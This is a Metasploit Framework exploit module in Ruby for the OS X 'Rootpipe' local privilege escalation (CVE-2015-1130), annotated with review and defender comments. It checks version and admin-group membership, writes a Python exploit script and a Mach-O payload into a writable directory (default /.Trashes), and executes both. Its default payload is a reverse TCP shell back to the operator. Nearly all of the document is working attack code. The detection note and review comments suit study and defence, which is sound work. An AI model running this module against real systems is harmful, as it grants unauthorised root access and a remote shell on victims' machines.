
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/osx/local/rootpipe.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # Local privilege escalation for CVE-2015-1130 ("Rootpipe").
  #
  # Flow, as written below: version + admin-group gate, then two files are
  # dropped into WritableDir (a Python exploit script and a Mach-O payload),
  # the script is run through the PYTHON interpreter, and the payload is
  # executed. Both dropped files are registered with FileDropper, so they are
  # removed when the session is cleaned up — on-disk artifacts are short-lived.
  Rank = GreatRanking

  include Msf::Post::File           # write_file, writable?
  include Msf::Post::OSX::Priv      # is_root?, is_admin?
  include Msf::Post::OSX::System    # get_sysinfo
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper # register_file_for_cleanup

  # Module metadata plus the two options this module reads:
  # PYTHON (interpreter used to run the dropped script) and the advanced
  # option WritableDir (drop directory for both files; defaults to /.Trashes).
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apple OS X Rootpipe Privilege Escalation',
      'Description' => %q{
        This module exploits a hidden backdoor API in Apple's Admin framework on
        Mac OS X to escalate privileges to root, dubbed "Rootpipe."

        This module was tested on Yosemite 10.10.2 and should work on previous versions.

        The patch for this issue was not backported to older releases.

        Note: you must run this exploit as an admin user to escalate to root.
      },
      'Author' => [
        'Emil Kvarnhammar', # Vulnerability discovery and PoC
        'joev',             # Copy/paste monkey
        'wvu'               # Meta copy/paste monkey
      ],
      'References' => [
        ['CVE', '2015-1130'],
        ['OSVDB', '114114'],
        ['EDB', '36692'],
        ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']
      ],
      'DisclosureDate' => '2015-04-09',
      'License' => MSF_LICENSE,
      'Platform' => 'osx',
      'Arch' => ARCH_X64,
      'SessionTypes' => ['shell'],
      'Privileged' => true,
      'Targets' => [
        ['Mac OS X 10.9-10.10.2', {}]
      ],
      'DefaultTarget' => 0,
      'DefaultOptions' => {
        'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
        'PrependSetreuid' => true
      }
    ))

    register_options [
      OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python'])
    ]
    # Advanced: where exploit_file and payload_file are written.
    register_advanced_options [
      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
    ]
  end

  # Directory that receives both dropped files (the WritableDir option).
  #
  # @return [String] WritableDir as a string ("" if unset)
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Reports Appears (not Vulnerable) because this is a version-range and
  # group-membership test, not a live probe of the vulnerable API. The
  # admin-group requirement matches the note in the Description.
  #
  # @return [Msf::Exploit::CheckCode] Appears when ver? and is_admin? both
  #   hold, Safe otherwise
  def check
    (ver? && is_admin?) ? CheckCode::Appears : CheckCode::Safe
  end

  # Pre-flight gates, then drop/run. Statement order matters: each file is
  # written and registered for cleanup before the next step, and the script
  # runs before the payload.
  #
  # Detection angle (defender note): the observable sequence is a Python
  # process started from WritableDir (/.Trashes by default) followed by
  # execution of a second file from the same directory with a random
  # 8-letter name; see exploit_file / payload_file.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on any failed gate
  def exploit
    # Nothing to escalate if the session already runs as root.
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    # Rootpipe requires admin-group membership (see Description).
    unless is_admin?
      fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."
    end

    # check re-evaluates is_admin?; the guard above makes that part redundant,
    # so effectively this gate is the ver? version-range test.
    if check != CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # NOTE(review): write_file's return value is not checked here or below;
    # a failed write is only noticed when the later cmd_exec fails.
    print_status("Writing exploit to `#{exploit_file}'")
    write_file(exploit_file, python_exploit)
    register_file_for_cleanup(exploit_file)

    print_status("Writing payload to `#{payload_file}'")
    write_file(payload_file, binary_payload)
    register_file_for_cleanup(payload_file)

    # cmd_exec output is discarded in both calls; success is not verified.
    print_status('Executing exploit...')
    cmd_exec(sploit)
    print_status('Executing payload...')
    cmd_exec(payload_file)
  end

  # Version gate: true when get_sysinfo's ProductVersion is within
  # 10.9..10.10.2 inclusive (Rex::Version#between?).
  #
  # @return [Boolean]
  def ver?
    Rex::Version.new(get_sysinfo['ProductVersion']).between?(
      Rex::Version.new('10.9'), Rex::Version.new('10.10.2')
    )
  end

  # Command line that runs the dropped script under the PYTHON interpreter.
  # payload_file is passed twice; what exploit.py does with each argument is
  # not visible from this module.
  #
  # @return [String]
  def sploit
    "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"
  end

  # Contents of the bundled exploit script, read from the framework data
  # directory (data/exploits/CVE-2015-1130/exploit.py).
  #
  # @return [String]
  def python_exploit
    File.read(File.join(
      Msf::Config.data_directory, 'exploits', 'CVE-2015-1130', 'exploit.py'
    ))
  end

  # The encoded payload wrapped as an x64 Mach-O executable.
  #
  # @return [String] binary image
  def binary_payload
    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
  end

  # Memoised drop path for the exploit script: base_dir plus a random
  # 8-letter alphabetic name. Memoisation keeps the status message, write,
  # cleanup registration and command line all pointing at the same path.
  # Built by string concatenation, so a WritableDir ending in "/" yields "//".
  #
  # @return [String]
  def exploit_file
    @exploit_file ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
  end

  # Memoised drop path for the payload binary; same construction as
  # exploit_file, independently randomised.
  #
  # @return [String]
  def payload_file
    @payload_file ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
  end
end